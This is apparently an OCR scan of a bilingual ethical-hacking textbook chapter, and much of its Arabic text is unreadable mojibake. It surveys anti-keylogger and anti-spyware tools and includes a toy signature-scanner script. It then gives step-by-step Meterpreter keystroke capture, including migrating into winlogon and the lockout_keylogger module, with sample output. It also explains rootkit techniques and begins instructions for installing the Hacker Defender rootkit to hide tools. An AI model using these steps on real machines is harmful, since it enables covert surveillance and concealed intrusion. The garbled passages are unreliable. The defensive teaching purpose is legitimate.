> >ilt <Jj3 j-G \ ^JJ ^JastjJa <J£ <Jj^ ijjJ j-a ja. jK ^iaJ ^cxat jilt £>i& .4 ^h"lVt ^bVlrnt e-Ujt ^jLu^a j> AjLa^J jj^« jl£ dlbLja-G 

j jilt (^Sc 6^^J j^aL^Jt JJ jjjrt^t j^-^- i^C* 4-Iai_jJa ^t <J-> ujJ ^c-gUjj ^t ( jj^> J-^^ S^Lja-a) ^c^Ujilt tit .^-ULalt 

# 4_iCjjuj jjc. ^Jai-jJaJt (Jj^joij ^lxAjjj jt 4x.jjjuu» ^jjlixJt L»» - ^» > oJ ^lxAjjj ^t jjuj 4<!i3t jtj 

£J3 jJ CjULj o^cla JjLLg jj jjj^lt jl^J> ClAiLJt <J£ <jjLLg (j^jla (jC ^^iiw^t jj^> ji^t J ja. j (jc c jj^« ji^t dlbLjaxi J^asu 

^ sUkJt ^j^j ( jj^jLill fj j^Vt *^LjaxJt L ^a*j .<jU^i3t <^>jt ^ ^Jtj (signature database) jj^J^ 

J (virtual keyboard) V^at j^Vt ^cjjIL« .L^^ilt ^> Jjj^ij (keyboard driver) ^laJt c^L JjjL 

m A )-* > ^jL^. jjiilt ^ uj^^ (j'TuV^t djLi^jj ^j-<i ^jj'lLJt ialiiilt ^ cJ*-?^ touchscreen 



Anti-keyloggers detect and disable software keyloggers. 

Some of the anti-keyloggers work by matching signatures of keylogger code with a signature database, while others protect keyboard drivers and kernels from manipulation by keyloggers. 

Using a virtual keyboard or touch screen makes it difficult for malicious spyware and Trojan programs to capture keystrokes. 
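The signature-matching approach described above, as an added example that is not the page's own code nor any anti-keylogger product's engine. The signature database, the sample "files" and the detection name are constructed for illustration. It applies two kinds of signatures to in-memory buffers: an exact SHA-256 of a known sample, and byte patterns that look for the import strings of a user-mode keyboard hook. The samples are chosen so the reader sees why a hash alone is not enough (a repacked copy has a new hash but the same strings) and why string patterns are not enough either (an obfuscated copy has neither), which is the gap the driver- and kernel-protecting products on this slide are meant to close.

```python
"""Toy signature-database scan (added example, constructed signatures and samples)."""
import hashlib
import re


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed sample files.  KNOWN_SAMPLE stands in for a keylogger already
# in the database; the others test how the signatures behave on variants.
KNOWN_SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 12
    + b"SetWindowsHookExA\x00user32.dll\x00GetAsyncKeyState\x00"
    + b"Starting the keystroke sniffer...\x00"
)
REPACKED_SAMPLE = (
    b"MZ\x90\x00" + b"UPX!" + b"\x00" * 40
    + b"SetWindowsHookExA\x00GetAsyncKeyState\x00"
)
BENIGN_SAMPLE = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00"
    b"This program cannot be run in DOS mode.\r\n"
)
# Same API strings as KNOWN_SAMPLE but XOR-encoded, as a packer would store them.
OBFUSCATED_SAMPLE = b"MZ\x90\x00" + bytes(
    b ^ 0x5A for b in b"SetWindowsHookExA\x00GetAsyncKeyState\x00"
)

SAMPLES = {
    "known_keylogger.exe": KNOWN_SAMPLE,
    "repacked_keylogger.exe": REPACKED_SAMPLE,
    "notepad.exe": BENIGN_SAMPLE,
    "obfuscated_keylogger.exe": OBFUSCATED_SAMPLE,
}

# Constructed signature database: one exact-hash entry and two byte patterns.
# "Keylogger.Constructed.A" is an invented detection name.
HASH_SIGNATURES = {sha256(KNOWN_SAMPLE): "Keylogger.Constructed.A"}
PATTERN_SIGNATURES = {
    # a hook installer and a key-state poller within 64 bytes of each other
    "hook_api_combo": re.compile(rb"SetWindowsHookEx.{0,64}GetAsyncKeyState", re.S),
    # a status string copied from the keystroke sniffer output shown later on this page
    "keyscan_marker": re.compile(rb"keystroke sniffer", re.I),
}


def scan_buffer(name, data, hash_db=HASH_SIGNATURES, pattern_db=PATTERN_SIGNATURES):
    """Return the hash and pattern signatures that match one buffer."""
    hits = []
    digest = sha256(data)
    if digest in hash_db:
        hits.append(("hash", hash_db[digest]))
    for sig_name, pattern in pattern_db.items():
        if pattern.search(data):
            hits.append(("pattern", sig_name))
    return {"name": name, "sha256": digest, "hits": hits}


def scan_all(samples=SAMPLES):
    """Scan every sample and return one result record per sample."""
    return [scan_buffer(name, data) for name, data in samples.items()]


if __name__ == "__main__":
    for result in scan_all():
        verdict = "DETECTED" if result["hits"] else "clean"
        print(f"{result['name']:28s} {verdict:8s} {result['hits']}")
```

The obfuscated sample scanning clean is the point of the exercise: a signature engine of this kind catches known code and close relatives, but a tool that protects the keyboard driver or inspects hook chains at runtime is what catches the variant that no signature describes.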
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Anti-Keylogger: Zemana AntiLogger 

Source: http://www.zemana.com 

^t jJtj j^jK cjU^a tiL ^UJt jjj;n^t jl^ f jib c^iltj ^t^Vt ^lc^ ^t £cJi jj j^Zemana AntiLogger 
c W^t ^ dlj ^j-aLkSt ^Uailt ^ilt dia jit ^ SjLjalt ^t jJt ^jc t &juj£]Ij ^ j^j AntiLogger.^^j^ c^^^J ^ UJ^^ 
^Ullt a luaJ t jJt ^ ^t cJ jU. tit ^^j/nj jjuj <ut dii^. .(signature fingerprint) ^j^^ ^i^Jt 

t jlxil^ jt t^jjfljjfLLaltj ttiL <j^aLkjj <JaaL^Jt ^t J jj^ jit jt 64jujLual3 djjj^ JaUlilt jt ttiL j^aLklt ^aUailt ^jxi ^JjlLJt CjUjjJa (Jj^ i aJJ 

(webcam logger) S-yj 

t j^\£ Jj^j* j <(£sx Logger) SSL lS^j lS^ <ili^Jt Cjt^^ilt ^ja AjLa^Jt jSjj Zemana AntiLogger 
J^^ J 6 {screen logger) ^l^Jt J j> > > n t (clipboard logger) 4-kaUJt J j> > » n t {KeyLogger)^^^ ^Uj^ J j> > ^ 6 

.(^ * O^^jJ^b 'SSL c^J^" '(spyware) 
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[Figure: Zemana AntiLogger 1.9.2.240 main window listing its protection modules (Anti-WebcamLogger among them), the protection status and the last analyzed object] 
Anti-Keyloggers: other tools 

^asu ^jjuj ^ij .Keyloggers ^3^' j O^)^ ***^ j*> a ^ t^jumV^I 2r*^ ^ (j^aLkll ^Uaill (j^tSj ^ j£i jj^> jl£ djtaLja^ 

■1^1 AiJa tiL (j^-it \\\ ^UaJl (jj^tdl Ig^al^Vlml (j^-oJ ^ill jj^> J?\ft^ S^Lja-a <j^ 

Anti-Keylogger available at http://www.anti-keyloggers.com 
PrivacyKeyboard available at http://www.anti-keylogger.com 
Defensewall HIPS available at http://www.softsphere.com 
Keyscrambler available at http://www.qfxsoftware.com 
I Hate Keyloggers available at http://dewasoft.com 
SpyShelter STOP-LOGGER available at http://www.spyshelter.com 
PrivacyKeyboard available at http://www.privacykeyboard.com 
Elite Anti Keylogger available at http://www.elite-antikeylogger.com 
CoDefender available at http://www.encassa.com 



How to Defend Against Spyware 

Au uJl cAiUJ! Jl* ajjjoJI dLa jlx-<JI j ^A^Luaxll (jj^ ^AaJLuiAll ^Uaill ^^ic. CiiiiilU ^ jij a\u\ ^^1 jj Spyware 
4 6^pJI djU^ ^j;^ cJaa^j J!^. 4_louj^)3I j^U^xJI <j>» s*i^l j ' m( ^& ajuAjA j^U^a Spyware 6 <J j 3 *^ dj!)t^juij 

I^Vl^ (Jjjjoi^jII ^1 jj .Ua ^li^ll (Jjia .l^JjUj lie. UjUIj ^jjjjai^jll 
(jjjjai^jll £c-gI jil (j^ajill (j^ ^jAslSI jSjJ <iV (tOO lOW) 4_jJaikia ^1 tiL ^U^aLaJl dljjljVI (j-al jlui* n >ij I^jI ^ jSl! V 
jl AJlc La] tiL (j^aLkll dljjljyi (j^a^xJjaixJ Lajb (jLaVI ^l^c] (J£*J ^aJJ ttillil ,tiL (j^aLkll JJ jJJ^ti j^-^- \ (pjffi 

# ^jjjjud^j3l ^c-al jj (jx» jj jJ la^ll 4_jL<^J ^Jajaj 
^tiL ^aLkJl jfi jJi^ll jl^-^J jJjubd ^ ^ 

(jl tilU^ (jl L— _(jja j^>*-ft jjje. (jJjajj-d (jxi 6^jl jll djliLJI djlsa^i j <a jjjuIaII ^ jjj^IVI ^^>^l lS^^j V 

^j^)JI JjLojj ^ 1 ^ a\m" a! jjjla ^1 j-<i ^iij V . jj jjj^ll ^^^Jc (Jjjjuo^jII ^iljj jl ^freewcive 'u^ jj^ lS> 
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.(jntn^^l ^Vijl a**) ^ jsH c— _ (Anti-spy ware software)u jjjud ^^ cjULnlajj ^ail^ll jJI 

(J^IaJ! ^Uajll I ^JJJJJ ^JJ ^jll (jouui^jll 6 ^ *^ cSjVI ^li^l Jak ^&AntispyWare 

.(jnui^Ml ^jW^ CS^^J ^ (J^al^Jl ^Uaill (_£JJ-^ (J^^J 

. (MS Configuration Manager reports)^^^ Sjtal j^j^j {Task Manager reports) >J4 j^j^ fLkub ^$1^ 

.liljj j-nm dlaJ ^jjjJ <_£,j]l JJ jJJ^ll ^aUaj ^I^Viml ( . UaJ 
t^cxaLjj ^1 (Jj^Vi <Jj3 .Sj^Jl LliLi^jjll l_u£jj j ^—^J^V^ cs - ^ ^c^ 1 J-^^ ^ Aa^Lujl t . l^J Lajb 

-laiijj <^jJ1 jj^iJI CjL^jjj^j j t^jUiVl jj-^^ jjII <jalij1 lIjL^jjj^j ^ ,j£Li ,<j Jjjj ^ Cy* j& 4j1 Cy* 

.(J-Ia^jH JjS ^jJalj ^3 ^glc <J ga^l3 1^1^. Ij£j ^jl VJ *;* , J .^lxAjjjII 
.(JjjjuixJI UJ^ La,jjc. Lfc,JjijJ ^aJJ j"-^^ ^c-aljJ (Jlxi SjLjall ^c-^I^Jl ^jV 4-JJjJjJa ^aJ La Sjl^Vl ^-^J ~ I^JLujJ V 

,t*L (j-aUJl ^Uaill <L1£3! ojIaJjuJl j-Laal^all J-^^J ^ tciUil ^JJJ j 

a U.v<*sfi j t^jLujVl AiLkj djLUj ^ ^jq^i\1j t^ijj^axi L_jLai^. J jj^a jll (public terminal) 3-aLJt ciiUs jlal I ~ iklujj V 

JJ.JJ 4£jjuJI .(jjyi,JjkjjuuJl (j-a ^jAslSI <Jj3 ^j-d l^Jl jj^ jll ^aJJj t^j^UaVl (^^^C 4_L<J dljau] 4^1x31 4 .l£^>^^ 4_jajLud^Jl 

^xiljJI d^a Jj^^Ij ^ jSj LoAic. <iV djjijyi 3 <uujjia3I 6 ja. j3l jl t screensavers'^W^^ C5%^ j - ^^ ^^i^ <J^3^ ^ V 

JW M J ' (your computer may be infected ) L?L^ jjSj ciL ^UJI jj jl^ jl 

J 4? ialjill 6^ ^ jSjII tic . (they can help your computer to run faster )p 4? j^j^^l 

jj jjj^ll j^?> Ajisj^J! CjULJIj ^tjjLill t^al ^<JI <jjjUc caches cJ^^ (cookies) -^-^j*^ ^Aj^*^ ^— ^L4Lq < ala 

C5^^ C5^^ L&-° tLaLaJ tilj jlaJjoa daJ ^jjjJ JJ jJJ>a£ ^UaJ ^^ic <j3Li jl <Jj uj CliLi jls^ jj jajj ^J V 



Anti-Spyware: PC Tools Spyware Doctor 

Source: http://www.pctools.com 

L_a^ .s jjiaaJI aj16 ^ ajjjjUI jjIIj (j> iu 0 M I jj jjja ciL ^-aUJI ^Uaill AjUaJI jSjj PC Tools Spyware Doctor 
l^a. J^Jl c> .^4? oa^JI ^^il c> ^ 'spybots Oj^J^ 'Trojans ^adware s jLjall ^1 jJI < atLk^ 

Li^JC > hj ^li^ll (j^J DjjJaaJl CjI^j^jII (h5 Ja. J^A ^1 laJLujl J ^jjjjoiajll ^x»ljJ AjJa AJLJI jl <iL <j^aLaJI 4_jjjoJI CjLi jlx-<Jl <jLaa. 

_tiL ^alaJl ^Uajll (jjdjoiajl! ^c-dl jj] Jxill <Ja.^j3l <JjS £yz I^Ja. CjliLJl (J^aa3 ^aJJ .AjLoaJl ^ A alia o dAJLla ^ ^dLjjjl I^A (J-dl^JJ 

PC Tools Spyware Doctor delivers simple protection against dangerous spyware. 

It stops and blocks spyware. 

It checks files before they can get on your PC and compromise your computer. 

[Figure: PC Tools Spyware Doctor "Protection Summary" window with the Start Scan Now button, http://www.pctools.com] 
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Anti-Spyware: other tools 
< dialers 'u^-jj^j '^in^JI <-!^ u ^y^ ^ ji ^j^j i> (Ji^lj u& <j-aUJI ^IkJI o-^^ij j& AntiSpyWare 

£aJI cjSjI! ^ ^jU^JI ja jj AntiSpyWare ^\ j ^\ jjkJI ^ lit ^1 jjj < rootkitsj < Keyloggers 'worms 



CjLi^a^J! o jlk (jLdjJal j/1 jl±x£l\ Q SJ ^ajSJ .^J^JJ J' ^JC- ^f^^ ^ alalia CjI^jS Cf-^* ^ sJ ^ ^ ^ ^aUaill (j^a^a ^J^)Ia 

SUPERAntiSpyware available at http ://superantispyware.com 

Spyware Terminator 2012 available at http://www.pcrx.com 

Ad- Aware Free Antivirus+ available at http://www.lavasoft.com 

Norton Internet Security available at http://in.norton.com 

SpyHunter available at http://www.enigmasoftware.com 

Kaspersky Internet Security 2013 available at http://www.kaspersky.com 

Secure Anywhere Complete 2012 available at http://www.webroot.com 

MacScan available at http://macscan.securemac.com 

Spybot - Search & Destroy available at http://www.safer-networking.org 

Malwarebytes Anti-Malware PRO available at http://www.malwarebytes.org 



Key Scan and Lockout Keylogger in Linux 

^1 j UjLoj Igic Uj^j ^1 j L-fl^^LudJi jlg^J! ^iilLJI CjlkiuJa JallilV s s^li <J Metasploit J-M J Meterpreter 
.Metasploit ^^-^ J-^ ^ s-UijL LLaa j JxilU AiljikU LLaa ^ill ^Uaill ^ l^iLaj .Keyloggers l3^^ 

jll (jjoii J LLLoj U£ Meterpreter J ^fo ^ 



Key Logging with Meterpreter 

.Meterpreter ^ ^ >«ijV( ^j^j ^jL lJj^ Meterpreter ^aj^ J help <^Lk> ^Ull ^ 

jal^kiujl 1 La^j L* tillil .^iilLJI djbjjja <jal^<J tilli j Keylogger j *I^V Meterpreter ^ .v^nl 1 \a^^ ^fil 

. key scan 



keyscan_dump     Dump the keystroke buffer 
keyscan_start    Start capturing keystrokes 
keyscan_stop     Stop capturing keystrokes 



.Meterpreter ^ jL J^Lk ^> keyscan_start axj jo ^iilLJI CjUjjja ^ j nu^M t 1^ 4-LLouj . l 



meterpreter > keyscan_start 
Starting the keystroke sniffer... 
meterpreter > 



^^jJa^ll j tljjJ JllxJl lS^* 1 (^C- ^^-Ic ^UjoiVI (jiaxJJ ^a^J^ A-l^jJa3l ^ajflJ (^^^ jUalj^l ^1 -la^a ,2 

.keyscan_dump tdli ^LLouj ^ U ^liull ^1 ^j^l *^ .3 



meterpreter > keyscan_dump 

Dumping captured keystrokes... 

google.com <Return> will Dallas go 8 an 8 again this year? <Return> 
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<jc tliaJU ^IS olLa J "go ogle. co in" ^M-^ ^ L_ogJI ~ i^jLuiaH q\ q^jxW 11a ^ <jt sj 

"Will Dallas go 8 and 8 again this year? " 

£A J^ (J-j*juJ^l ^aUaj Jc (_£^)^.l 6J-a L-l&ij <jVI . JJJ-^ A^ftlS £x» J l£^>^I J J^-^l (Jj? ' ^ ."L" ^^-*J " jj^j" 

U keyscan_dump 



meterpreter > keyscan_dump 
Dumping captured keystrokes... 

<LWin> l 
meterpreter > 



<_£^kl 0^)>» (Jjl^jaulL ^ala 4-^3j A-uiLuill L£^lj 1 ^ (J^-ulJ L + jj-^J J^-** J^ S" 5 ^ - ^^ 4_l^jJa3l jl^-^ (J I (S^y Lft£ 

[l^il^joaJ ^aJJ ^aJ liLal ?jj^<Jl ^jjU t4.uiL.rtll ^Ic. s-li-IV JJJ-a £a 

cJ J^-^l <Jj-> > >n 4_iij <jc c allkj L_u£-<Jl ^Jajuj 4_liJ Q\ i4 Ll > nn C : *n^> . jjAiijll <j-aVI ^aUaj tgJ (J-a*J ^^jll <L^]a3| ^ <J£jouJ| 

l^ax1\ * 1 ula ciijl£ lij !il a 3 alia o ^jjILJI jl ^ i^jLujj l^J!)lk ciu^ ^<J j^.^ ^jUr>^ win logon <J ^>^^L Lil ^l_u£-<JI ^^-^ 
C5-^ Keyloggers l!^ ^^i^ <— i j^j .c^^J^ (jj^S*!! jl 4 J * ^ ^L^u ^aLkJI ^iilLJI Jalilll kj > >n ^jla l_u£a3I ^Jojoj 
^Jajuj Alij ^ Winlogon c^^Meterpreter ^j^ 3 t — * ^Louj 44_ILaJ! ^k .1^5! j>» ^^11 J-^^ 

.^^kl keyscan >^ ^ . ( ^ ^ (jc ;^ 1 ^ ^ LLaiijl migrate i^i> J ; l_u£-<JI 

PID J jj^JI cli^aj . j VI Ja*j ^1 cjLUsJL ^ta J J t ^^ Meterpreter j^/'^h^ ^k A^Uiaj ^jij .4 

.Winlogon ^AaxJIj ^-aUJI 



meterpreter > ps 

Process List 
============ 

 PID   PPID  Name              Arch  Session     User     Path 
 ---   ----  ----              ----  -------     ----     ---- 
 0     0     [System Process]        4294967295 
 4     0     System                  4294967295 
 236   4     smss.exe                4294967295 
 316   1404  jusched.exe       x86   1           WIN-...  ...Files\Common Files\Java\Java Update\jusched.exe 
 336   304   csrss.exe               4294967295 
 388   380   csrss.exe               4294967295 
 396   304   wininit.exe             4294967295 
 432   380   winlogon.exe            4294967295 

Meterpreter l& <-* 432 yr* winlogon.exe o^UJI PID u' ^ s jj^ll ^> ^ jj U£ di^ 

.PID Jl liA Jl (session) <^ Jl 
.migrate 432 uj^j ^ J PID ^ migrate j^VI <xjUoj ^jSj .5 



meterpreter > migrate 432 
[*] Migrating from 2688 to 432... 
[*] Migration completed successfully. 
meterpreter > 



system ^^1 CjL^^a Jl citL^X^ ^kj Jl j-H^j u^j^k insufficient privileges LLaJI ^SLuj j J^ ciiL^ lil 

.privileges 

.keyscan_dump ^ ^ keyscan_start j^VI ^j5j jVI .6 
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Meterpreter t> use post/windows/capture/lockout_keylogger ^j^VI L^J c^jSaj 



meterpreter > background 
[*] Backgrounding session 3... 
msf exploit(bypassuac) > use post/windows/capture/lockout_keylogger 
msf post(lockout_keylogger) > set session 3 
session => 3 
msf post(lockout_keylogger) > exploit 
[*] Found WINLOGON at PID:3824 
[*] Migrating from PID:3484 
[*] Migrated to WINLOGON PID: 3824 successfully 
[+] Keylogging for WIN-LQANLQTPQLU\Ralf @ WIN-LQANLQTDQLU 



5.6 HIDING FILES

As with covering tracks, the attacker has to hide the files and tools left on the compromised system so that protective applications (anti-virus, host intrusion detection) and the administrator do not find them. Hiding these files from the protective applications is what keeps the rest of the attack, the backdoors, the sniffers and the stolen data, alive on the host.



Rootkits

Rootkits come up constantly in connection with Metasploit and post-exploitation, and they are widely misunderstood. The name is made of "root", the administrator account on UNIX (root/admin access), and "kit", a collection of tools: a rootkit is a set of tools that lets an attacker keep the highest level of access to a system while remaining hidden. Rootkits are designed to be stealthy: they hide from the anti-virus and from the administrator, and they normally bundle backdoors so that the attacker can get back in.

Once a rootkit is installed, the operating system can no longer be trusted to tell the truth about itself. A rootkit works by "hooking" the functions of the operating system and intercepting the data they return to programs. Press Ctrl+Alt+Del and open the task manager: the list of processes you see is whatever the rootkit allows the task manager to display. The same holds for file listings, registry keys and network connections, because every tool on the system asks the same subverted operating system for its information.

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A rootkit is not an exploit. It needs root/administrator access to be installed, and the attacker has to obtain that first, by exploiting a vulnerability or stealing credentials; the rootkit is then used to keep that access and to hide what the attacker does on the system. Rootkit packages commonly include a backdoor, DDoS tools, a packet sniffer, log-wiping utilities and IRC bots.

The simplest way to hide a file, and the first thing to understand, is the file's attributes. Every file carries attributes that describe its format and status, such as hidden, archive and read-only. A program reads them through GetFileAttributesEx() or GetFileInformationByHandle(), and ATTRIB.exe sets them from the command line. Setting the hidden attribute only fools the default view of Explorer; any tool that shows hidden files, and any rootkit detector, still sees the file.

How rootkits get onto a system

A rootkit is installed once the attacker already has root or administrator access, which is obtained through vectors such as:

- exploiting a zero-day vulnerability (privilege escalation, buffer overflow, kernel bugs, and so on);
- by means of a link and a bot from IRC, ICQ, etc.;
- a malicious file or e-mail attachment delivered to the victim.

The types of rootkits are described below.

Types of Rootkits

This section describes the types of rootkits and the backdoor access each gives the attacker. Rootkits are classified by the layer of the system at which they run; the lower the layer, the more the rootkit controls and the harder it is to detect from inside the system. The main types are:

Hypervisor-level Rootkit

With virtualization, a virtual machine runs on top of the physical hardware under the control of a hypervisor (VMware and similar products). Hypervisor-level rootkits exploit the hardware virtualization features of modern CPUs, Intel VT and AMD-V, to install themselves beneath the running operating system: the rootkit modifies the system's boot sequence so that it loads first, as a hypervisor, and then loads the original operating system as a guest inside a virtual machine that the rootkit controls. The operating system keeps running, apparently unchanged, while everything it does passes through the rootkit.

Virtual rootkits, as hypervisor-level rootkits are also called, build on three concepts:

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- Hypervisor
- Virtualization strategies
- Virtual memory management

and a virtual rootkit has two characteristic aims:

- Escaping from a virtual environment
- Hijacking the hypervisor

Virtualization

Virtualization is the sharing of the physical resources of one machine (CPU, memory, storage, network) among several operating systems, each of which behaves as if it owned the hardware. Traditionally one PC ran one operating system directly on the hardware; with virtualization the same hardware hosts several virtual machines at once, for example a Windows server, a Linux web server and an ordinary desktop system, each in its own virtual machine.

Virtualization of system resources: Virtual Machines

1. A Process Virtual Machine (also called an Application Virtual Machine) runs a single process and exists only for that process; the Java Virtual Machine and the .NET Framework are examples. It is not a complete machine.
2. A System Virtual Machine (Hardware Virtual Machine) presents a complete virtual computer on which an entire operating system can run.

Hypervisor

The hypervisor is the component that handles system-level virtualization for hardware virtual machines. It sits between the physical hardware (or the host system) and the VMs, presents virtual hardware to each VM, and controls and schedules the VMs' access to the physical resources. There are two kinds:

- Native (bare-metal): runs directly on the hardware, as the first software on the motherboard, and the VMs run on top of it. Hardware support for native hypervisors includes AMD-V/Pacifica, Intel VT and UltraSPARC T1.
- Hosted: runs as an application inside a host operating system, which in turn runs on the hardware; VMware Workstation and Oracle VirtualBox are examples.

Virtualization strategies

- Full virtualization (hardware emulation): the hypervisor, through virtual machine emulation, imitates the physical hardware completely, so an unmodified guest OS runs in the VM without knowing that it is virtualized. The difficulty is that the guest kernel expects to run at the highest privilege level; privileged CPU instructions issued by the guest have to be trapped and carried out by the hypervisor on its behalf.
- Paravirtualization: the guest operating system is modified so that, instead of executing privileged instructions on the hardware, it calls the hypervisor through an explicit interface. This is faster but needs a cooperating guest kernel.
- OS-level virtualization: a single operating system kernel isolates several user-space instances (containers) from one another; there is no hypervisor and all instances share one kernel.

Virtual memory management

The hypervisor maps the virtual hardware memory seen by each VM onto the physical hardware memory. Virtual memory as such is not specific to virtualization: every modern operating system already uses it to give each process its own address space and to support multiprocessing.

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On top of that, the hypervisor keeps the memory of each VM separate: no VM can read or write the memory space of another, which is what virtual machine isolation relies on.

Installing a Virtual Rootkit

A virtual rootkit has to get between the operating system and the hardware, whether it starts out inside a VM or on the host machine. Two things matter to it: escaping from a virtual environment (getting code that runs in a VM to run on the host), and, before that, finding out whether it is running inside a VM at all rather than on a real machine.

Three kinds of virtual rootkit are distinguished:

- Virtualization-aware malware (VAM) checks for the drivers, devices, registry keys and timing characteristics of a virtual machine and changes its behaviour accordingly, for example by refusing to run or by behaving harmlessly inside the VM; this polymorphic behaviour also frustrates analysts who run malware in a VM. It does not itself modify the virtualization layer.
- Virtual machine-based rootkits (VMBR) install themselves beneath the existing operating system and move that system into a virtual machine; the original OS becomes a guest of the rootkit's own virtualization software.
- Hypervisor virtual machine (HVM) rootkits use the CPU's hardware virtualization support to load a thin hypervisor under the running operating system on the fly; the OS is turned into a guest VM without a reboot.

Escaping from the VM to the host machine: the attacker inside the guest uses an exploit against the virtualization software itself, typically a bug in the emulated devices or in a host-side service that can be crashed or made to execute code, or abuses the communication channel (ComChannel) that the virtualization software provides between guest OS and host OS.

Hijacking the hypervisor: once on the host, the attacker takes control of the hypervisor and with it of every VM it runs; the host and all its guests are then under the rootkit's control.

Well-known virtual rootkits are:
- SubVirt, by Samuel T. King and Peter M. Chen at the University of Michigan.
- Blue Pill, by Joanna Rutkowska, based on AMD-V.
- Vitriol, by Dino Dai Zovi, based on Intel VT.
Kernel-Level Rootkit

The kernel is the core of the operating system, and a rootkit that lives there is the most dangerous kind, because it runs at the same privilege level as the kernel itself and nothing above it can be trusted. A kernel-level rootkit adds its own code to the kernel, or replaces parts of the kernel and its device drivers, to hide the attacker's files, processes and connections and to provide backdoors. On Windows it is usually loaded as a device driver, on Linux as a loadable kernel module. Detecting it from inside the same system is very hard, because the detection tools rely on the very kernel that has been modified; on the other hand a bug in the rootkit crashes the whole system, so badly written kernel rootkits often give themselves away through instability.

Application-level Rootkit

An application-level rootkit works inside a single application on the target system. It replaces regular application binaries with trojaned versions, or modifies the behaviour of existing applications with patches, injected code or hooks, so that the application itself lies about files, processes or connections.

Hardware/Firmware Rootkit

Hardware/firmware rootkits hide in the firmware of devices or of the platform itself, for example in the BIOS, in a network card or in the firmware of a hard disk, by storing a malware image there. Firmware is rarely inspected for integrity and survives a reinstallation of the operating system, so a firmware rootkit persists even after the disk has been wiped.

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Boot-loader-level Rootkit (Bootkit)

A bootkit replaces or modifies the legitimate boot loader so that it gains control before the operating system starts. Because it runs before the kernel and before any security software, it can load its own code underneath the operating system, which makes it a threat to every protection that starts later.

Library-level Rootkits

Library-level rootkits work at the level of the system libraries that applications use to make system calls. They patch, hook or replace these library functions so that the information returned to programs is filtered, hiding the attacker's files and processes, and so that a backdoor is available to the attacker.



How Rootkits Work

System hooking: the rootkit replaces the original function pointer that the system uses to reach a function (in a process's import table, or in the kernel's system call table) with a pointer to its own code. Every call then passes through the rootkit first, which lets it filter the results and stay in stealth mode.

Inline function hooking: instead of changing a pointer, the rootkit overwrites the first bytes of the function itself inside the core system DLLs (kernel32.dll and ntdll.dll) with a jump into its own code. The original function is still executed, but only after the rootkit has decided what the caller is allowed to see.




Figure: inline hooking of FindNextFile.

Process (before hooking)
  Code section           Call FindNextFile
  Import data section    FindNextFile: 0x87654321
  Kernel32.dll           0x87654321: FindNextFile code

Process (after hooking)
  Code section           Call FindNextFile
  Import data section    FindNextFile: 0x87654321
  Kernel32.dll           0x87654321: FindNextFile, whose first 5 bytes the rootkit has replaced with  jmp 0x90045123
  Rootkit code           0x90045123: MyFindNextFile


Direct Kernel Object Manipulation (DKOM) rootkits go one step further than hooking: they modify the kernel's own data structures in memory. The kernel keeps the objects that describe the running processes (the system process objects) in kernel memory; a DKOM rootkit locates those structures and patches them directly. This lets it hide processes and ports, add privileges to a process token, and misguide the Windows event viewer, without installing a single hook that a scanner could spot. To get at the process identifier structures it needs read/write access to kernel memory, which Fu-era rootkits obtained through the \Device\PhysicalMemory object. DKOM rootkits hide a process by unlinking its entry from the doubly linked list of active processes that the process-listing APIs walk.









Figure: hiding a process by DKOM. Each process object (Process 1, Process 2, Process 3) contains a Unique process ID and an ActiveProcessLinks field, a LIST_ENTRY { *FLINK, *BLINK } that chains it into the circular list of all processes. To hide Process 2, the rootkit points Process 1's FLINK at Process 3 and Process 3's BLINK back at Process 1. Process 2 keeps its process identifiers and keeps running, because the scheduler works on threads rather than on this list, but any tool that enumerates processes by walking the list never reaches it.
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Rootkit: Fu

Fu is the classic example of a DKOM rootkit. It has two components: the dropper (fu.exe) and the driver (msdirectx.sys). The driver modifies the kernel process objects that the operating system keeps for every running process. Tools such as TaskMgr.exe ask the operating system, through its API, for the list of processes; the operating system builds that list by walking its process objects, and Fu simply unlinks the objects it wants hidden. The unlinked processes keep running normally, but they no longer appear in any list. Fu uses the same technique to hide drivers, can add privileges to any process token, and can hide its activity from the Windows event viewer. It does not use hooking at all, which is why hook-based detectors miss it.


Fu operates using direct Kernel object manipulation.

Components of Fu are the dropper (fu.exe) and the driver (msdirectx.sys).

It allows the attacker to:
- Hide processes and drivers
- Hide information from user-mode applications and even from kernel-mode modules
- Add privileges to any process token
- Remove to-be-hidden entries from two linked lists with symbolic names

(Screenshot: a command prompt running fu -pl 38, which lists the processes with their PIDs, System:4, smss.exe, csrss.exe, winlogon, services, lsass.exe, several svchost.exe, spoolsv.exe, VMwareService, alg.exe, explorer.exe, wscntfy.exe, VMwareTray.exe, VMwareUser.exe, ctfmon.exe, cmd.exe and taskmgr.exe, followed by the number of processes.)



Rootkit: KBeast

KBeast (Kernel Beast) is a Linux kernel rootkit loaded as a kernel module. It supports the 2.6.16, 2.6.18, 2.6.32 and 2.6.35 kernels and is installed after root access has been obtained. Besides the kernel module it contains a userland backdoor component, which the kernel module keeps hidden from the other userland tools. KBeast hides its own module, files, directories and processes (from ps, pstree, top and lsof), hides sockets and connections (from netstat and lsof), logs keystrokes to capture user activity, and provides both a local root escalation backdoor and a remote backdoor; it does this by hooking the system calls that the affected tools rely on.

Its features are:

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- Hiding this loadable kernel module
- Hiding files/directory
- Hiding process (ps, pstree, top, lsof)
- Hiding socket and connections (netstat, lsof)
- Keystroke logging to capture user activity
- Anti-kill process
- Anti-remove file
- Anti-delete this loadable kernel module
- Local root escalation backdoor
- Remote binding backdoor hidden by the kernel rootkit

Hacker Defender: It is Not What You Think

Do not let the name mislead you: Hacker Defender is a rootkit, not a tool that defends against hackers. It is one of the oldest and best-known Windows rootkits, and it is still found on compromised machines because its source code has been public for years; many variants have been built from it, and it is frequently bundled into other malware programs.

Hacker Defender consists of three files: hxdef100.exe, hxdef100.ini and bdcli100.exe. hxdef100.exe is the rootkit itself, the program that installs the hiding driver and service. hxdef100.ini is the configuration file that tells it which files, processes, services, registry keys and ports to hide. bdcli100.exe is the client used to connect to the backdoor that Hacker Defender opens.

Download hxdef100.zip and extract it into a folder on the system partition (partition C:); the rest of this walk-through assumes that folder is C:\rk ("rk" for rootkit). Put every other tool you intend to hide into the same folder, because the whole folder will be hidden once the rootkit runs. The behaviour of Hacker Defender is then set in hxdef100.ini.

The .ini file is divided into sections, each holding a list of names. The default configuration that ships in the archive looks like this:

[Hidden Table]
hxdef*
rcmd.exe
[Hidden Processes]
hxdef*
rcmd.exe
[Root Processes]
hxdef*
